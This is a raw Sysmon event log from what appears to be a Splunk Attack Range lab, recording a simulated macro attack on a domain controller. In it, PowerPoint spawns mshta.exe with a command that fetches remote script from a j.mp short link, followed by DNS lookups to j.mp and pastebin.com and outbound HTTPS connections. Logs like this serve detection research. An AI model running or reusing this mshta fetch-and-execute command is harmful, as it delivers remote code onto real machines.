14:59:27.715{A7A01FEF-B626-607E-1600-00000000BB01}15406976C:\Windows\system32\svchost.exe{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.715{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.434{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.434{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.434{A7A01FEF-C0A3-607E-6C05-00000000BB01}36241208C:\Windows\system32\csrss.exe{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.434{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.434{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.434{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\Office16\AppVIsvSubsystems64.dll+43ae7|C:\Program Files\Microsoft Office\root\Office16\AppVIsvSubsystems64.dll+4358a|C:\Program Files\Microsoft Office\root\Office16\AppVIsvSubsystems64.dll+44642|C:\Program Files\Microsoft Office\root\Office16\AppVIsvSubsystems64.dll+3c560|C:\Program Files\Microsoft Office\root\Office16\AppVIsvSubsystems64.dll+3d357|C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL+100e92|UNKNOWN(0000015D6E2ED662) 154100x800000000000000081886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.441{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"mshta""https:\\j.mp\obi3zfngcbyc56rcegve"C:\Temp\ATTACKRANGE\Administrator{A7A01FEF-C0A5-607E-58C6-320000000000}0x32c6582HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE" 23542300x800000000000000050790Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:27.652{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF351C9997CF5B7D4966ED0DBC56E5C2,SHA256=00CF92D3F6D89C26456A274DCECF0E66104BB38B5BE88576AB5BFBFDAB77364B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050789Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:25.479{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55223-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050788Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:23.957{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53752-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000081925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.602{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com52213-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.318{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-20865-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000081923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.793{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D6FA91C79EAF65B73184B870F2DF7C8,SHA256=202F93D0D55F6B9EB22C7395B2D2286AB5FFF74259D9E97EFB59FD03F075C208,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.543{A7A01FEF-C0A6-607E-8105-00000000BB01}8364040C:\Windows\Explorer.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.543{A7A01FEF-C0A6-607E-8105-00000000BB01}8364040C:\Windows\Explorer.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.543{A7A01FEF-C0A6-607E-8105-00000000BB01}8364040C:\Windows\Explorer.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.543{A7A01FEF-C0A6-607E-8105-00000000BB01}8366048C:\Windows\Explorer.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.543{A7A01FEF-C0A6-607E-8105-00000000BB01}8366048C:\Windows\Explorer.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.543{A7A01FEF-C0A6-607E-8105-00000000BB01}8366048C:\Windows\Explorer.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.543{A7A01FEF-C0A6-607E-8105-00000000BB01}8366048C:\Windows\Explorer.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.528{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.528{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.528{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000081912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.199{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\powerpnt.exe.db-walMD5=81E6D016537E41BEE6EC9F9F1D4CAF12,SHA256=3275A4CF7649C53B8EC0F0CA542EBFB86D03340B8EEEE4F3C1E847FE34CBD764,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.199{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\powerpnt.exe.db-shmMD5=F3100ECB512E54666E63B90618CF4E28,SHA256=AA322BD248B2D03E4958EA8A25EF1C438D88AF8DCE43C0DB81FF9E291A8BB1BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.996{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\~DFCF2AB9327A6104DE.TMPMD5=3851AB7962D7134C341A017B96F4B8B2,SHA256=99F81C548F53603C95032E56B05DDD265A54E64C84E9BAB9F10D81D16E7102BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:27.996{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\~DFBB44A8711153EF9A.TMPMD5=28C6D3931F2BDB69ABC43CFC03B4B9B2,SHA256=9BED5393078033FADD0DC2B9EA719FE82E71671A1304E41824BC36AF859066F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050792Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:28.683{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CF2F74D36003E193B772A3F44F4DE52,SHA256=1C955E1CBF159EAEBB0984BCA2705AE6DC52C287FDD2AA5F621AE8F17237A0AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050791Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:28.074{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A7F31B4E88939F666123C05D1BDB4866,SHA256=C159459AF42E8AC83E5158BF85798B84BBDA150C9009841761BCC746FFBD010B,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000081936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.225{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016pastebin.com0::ffff:104.23.99.190;::ffff:104.23.98.190;C:\Windows\System32\mshta.exe 22542200x800000000000000081935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.014{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016j.mp0::ffff:67.199.248.16;::ffff:67.199.248.17;C:\Windows\System32\mshta.exe 354300x800000000000000081934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.749{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-22225-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.226{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\System32\mshta.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57649-false104.23.99.190-443https 354300x800000000000000081932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.212{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local64388- 354300x800000000000000081931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.092{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\System32\mshta.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57648-false93.184.220.29-80http 354300x800000000000000081930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.087{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local59972- 354300x800000000000000081929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.049{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\System32\mshta.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57647-false67.199.248.16-443https 354300x800000000000000081928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:28.001{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local63502- 23542300x800000000000000081927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:29.809{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C86B1DFBDFDBA0763CB1D6C52B07AF77,SHA256=1A26E18DD502C241098C05CFA2888B049A796278F1292C19A50893224D9C92FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:29.012{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=739246A3DAFC5B1CF4B051066E18D21B,SHA256=EF8103673C027B4BC06C6E29B07681D26C4891E1442872D62FFE56556A1FE5FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050793Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:29.699{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=472F2D5DCC55CB1B06975BEBFEC91231,SHA256=919B3441415FED16E007822AA24B8C679EFE3A88954B9495373D642B6F96B3B6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:29.140{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57650-false10.0.1.12-8000- 23542300x800000000000000081937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:30.824{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 